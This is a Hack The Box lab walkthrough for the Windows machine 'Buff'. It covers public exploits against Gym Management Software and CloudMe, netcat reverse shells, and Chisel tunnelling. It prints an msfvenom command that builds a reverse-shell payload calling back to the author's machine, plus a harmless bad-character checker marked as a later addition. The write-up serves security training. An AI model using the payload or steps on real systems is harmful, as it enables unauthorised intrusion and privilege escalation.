Walkthrough — HTB Windows machine “Buff”
Quick enumeration of the machine with nmap revealed the following information:
A quick look at the content provided by the HTTP server:
Browsing the site suggests it is written in PHP and runs “Gym Management Software 1.0”:
A quick search online leads to an unverified exploit on Exploit-DB (https://www.exploit-db.com/exploits/48506). Glancing through the code, it looked like no changes were needed, so I ran it as-is, but then had to make a few modifications for it to work under Python 3. We get there eventually:
Let’s see if it works:
I was hoping for a reverse shell. Nevertheless, the exploit appears to have successfully created the PHP script on the target:
We do appear to have command execution:
With this, I was able to copy netcat across from a Python 3 HTTP server hosted on my machine:
And then initiate a reverse shell:
Further enumeration from within the system revealed CloudMe.exe running:
We can see Shaun, the current user, downloaded it — we’re also given the software version:
Browsing online, I found an exploit on Exploit-DB (https://www.exploit-db.com/exploits/48389). Reading through it, the exploit clearly needs a connection to port 8888; this did not show up on my initial scan, but local enumeration revealed the port is listening on the host:
I modified the exploit to initiate another reverse shell, taking into account the bad characters referenced in the initial exploit:
msfvenom -a x86 -p windows/shell_reverse_tcp LPORT=53 LHOST=10.10.14.6 -b '\x00\x0A\x0D' -f python -v payload
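A small sanity check I would add at this step, written for this writeup and not part of the original post or of either Exploit-DB script: it parses the shape of msfvenom's `-f python -v payload` output and reports any of the excluded bytes (\x00, \x0A, \x0D) that ended up in the generated bytes, with their offsets. The sample output below is constructed from placeholder bytes, with a deliberate \x0a and \x0d so the detection is visible; it is not a real payload.

```python
import re

# The bytes excluded with -b '\x00\x0A\x0D' in the msfvenom command above.
BAD_CHARS = b"\x00\x0a\x0d"

# Constructed sample in the shape of msfvenom's '-f python -v payload' output.
# Placeholder bytes only, with a deliberate \x0a and \x0d to exercise the check.
SAMPLE_OUTPUT = '''payload =  b""
payload += b"\\x90\\x90\\x41\\x0a\\x42"
payload += b"\\x43\\x0d\\x44"
'''


def parse_msfvenom_python(text):
    """Reassemble the raw bytes from every b"\\x.." literal in the output.

    The empty initial b"" is skipped because the pattern needs at least one escape.
    """
    out = bytearray()
    for m in re.finditer(r'b"((?:\\x[0-9a-fA-F]{2})+)"', text):
        out += bytes.fromhex(m.group(1).replace("\\x", ""))
    return bytes(out)


def find_bad_chars(payload, bad=BAD_CHARS):
    """Return (offset, byte) pairs for every forbidden byte present in the payload."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def check_payload(text, bad=BAD_CHARS):
    """Parse msfvenom output and report its length plus any bad-character hits."""
    payload = parse_msfvenom_python(text)
    return {"length": len(payload), "bad": find_bad_chars(payload, bad)}


if __name__ == "__main__":
    report = check_payload(SAMPLE_OUTPUT)
    print(f"{report['length']} bytes parsed")
    for offset, byte in report["bad"]:
        print(f"bad character 0x{byte:02x} at offset {offset}")
```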
I then transferred plink.exe across, planning to use it to forward the port to my local Kali machine, but after far longer than I would have liked I gave up and moved to a different tool:
I transferred across Chisel (https://github.com/jpillora/chisel/releases):
And used it to create a tunnel, so port 8888 on the server is now reachable from my machine:
Finally, running the Python exploit we modified earlier gives us a shell as the administrator account on Buff, caught by my netcat listener on port 53: